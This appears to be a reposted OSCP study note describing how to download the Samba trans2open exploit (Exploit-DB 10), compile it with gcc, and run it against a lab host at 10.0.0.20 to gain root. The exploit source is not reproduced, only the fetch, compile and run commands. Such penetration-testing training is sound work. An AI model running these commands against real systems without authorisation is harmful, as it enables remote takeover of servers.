码迷,mamicode.com
首页 > 其他好文 > 详细

OSCP Learning Notes - Exploit(2)

时间:2019-07-06 19:23:13      阅读:102      评论:0      收藏:0      [点我收藏+]

标签:arch   nload   rom   base   roo   targe   root   data   exe   

Compiling an Exploit

Exercise: samba exploit

1. Search and download the samba exploit source code from Exploit Database.

https://www.exploit-db.com/exploits/10

技术图片

2. Compile the source code.

gcc 10.c -o trans2open

 

技术图片

 

3. Use the trans2open tool to exploit the target server. Root the target server sucessfully.

 

./trans2open -b 0 10.0.0.20

 

技术图片

 

OSCP Learning Notes - Exploit(2)

标签:arch   nload   rom   base   roo   targe   root   data   exe   

原文地址:https://www.cnblogs.com/keepmoving1113/p/11143589.html

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!